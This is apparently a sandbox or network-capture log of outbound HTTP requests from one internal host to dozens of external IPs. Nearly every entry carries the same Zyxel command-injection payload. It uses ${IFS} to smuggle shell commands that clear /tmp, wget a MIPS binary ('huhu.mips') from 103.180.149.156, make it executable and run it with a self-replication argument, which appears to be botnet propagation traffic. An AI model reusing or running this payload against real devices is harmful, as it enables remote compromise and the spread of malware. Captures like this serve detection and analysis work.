                                                        Feb 2, 2024 06:21:07.883955956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3854192.168.2.1446516122.53.242.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.884001017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3855192.168.2.143958099.174.150.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.884038925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3856192.168.2.1449070170.129.158.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.884068966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3857192.168.2.1460992158.149.65.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.884119987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3858192.168.2.144473072.252.172.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.884167910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3859192.168.2.146088418.45.33.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.884200096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3860192.168.2.144123062.91.19.108443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.884254932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3861192.168.2.144763041.68.90.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.884280920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3862192.168.2.143501039.9.218.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.884329081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3863192.168.2.144166476.80.16.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.884356022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3864192.168.2.14414448.70.59.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.884390116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3865192.168.2.1443564178.215.214.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.884411097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3866192.168.2.1436822157.181.251.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.884452105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3867192.168.2.1449820194.83.245.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.884495020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3868192.168.2.146014832.156.135.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.884543896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3869192.168.2.1455680145.111.100.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.884589911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3870192.168.2.1444084132.238.198.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.884623051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3871192.168.2.1454224111.32.243.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.884673119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3872192.168.2.14363802.112.238.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.884673119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3873192.168.2.1454002161.152.75.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.884711027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3874192.168.2.1434540161.6.207.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.884772062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3875192.168.2.144568040.151.100.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.884799957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3876192.168.2.144807217.101.158.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.884860039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3877192.168.2.1455698217.116.151.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.884892941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3878192.168.2.143525672.74.240.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.884922028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3879192.168.2.1456516142.168.97.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.884963036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3880192.168.2.1439626153.159.110.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.885023117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3881192.168.2.143441041.50.69.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.885049105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3882192.168.2.1436374208.92.172.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.885077000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3883192.168.2.1452230212.252.199.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.885119915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3884192.168.2.1460544209.200.117.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.885142088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3885192.168.2.1444260175.108.155.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.885191917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3886192.168.2.143337496.124.81.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.885236025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3887192.168.2.1460144126.172.82.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.885260105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3888192.168.2.1451256186.218.109.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.885318995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3889192.168.2.144997481.26.186.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.885350943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3890192.168.2.145575649.153.161.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.885384083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3891192.168.2.143919653.102.220.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.885438919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3892192.168.2.143729020.96.99.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.885474920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3893192.168.2.1458694103.40.83.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.885499954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3894192.168.2.1447580133.190.43.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.885569096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3895192.168.2.1453742103.167.13.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.885597944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3896192.168.2.1450840123.234.4.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.885642052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3897192.168.2.1451088219.185.32.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.885687113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3898192.168.2.1453682136.225.113.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.885719061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3899192.168.2.1450352202.239.232.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.885766983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3900192.168.2.143802439.58.172.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.885782957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3901192.168.2.144040279.182.55.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.885900974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3902192.168.2.145276476.236.192.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.885911942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3903192.168.2.1441034192.183.31.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.885931969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3904192.168.2.145929671.75.84.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.885979891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3905192.168.2.143873676.183.46.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.886039019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3906192.168.2.1441706205.28.81.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.886081934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3907192.168.2.1448112165.214.124.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.886137009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3908192.168.2.143392892.225.245.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.886188984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3909192.168.2.1448790157.114.157.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.886225939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3910192.168.2.1447240199.223.126.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.886257887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3911192.168.2.14530209.247.85.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.886310101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3912192.168.2.1446068182.43.12.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.886338949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3913192.168.2.1451590165.104.142.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.886390924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3914192.168.2.143574697.236.72.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.886442900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3915192.168.2.1455226222.27.25.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.886502981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3916192.168.2.1434278145.105.240.201443
                                                        TimestampBytes transferredDirectionData
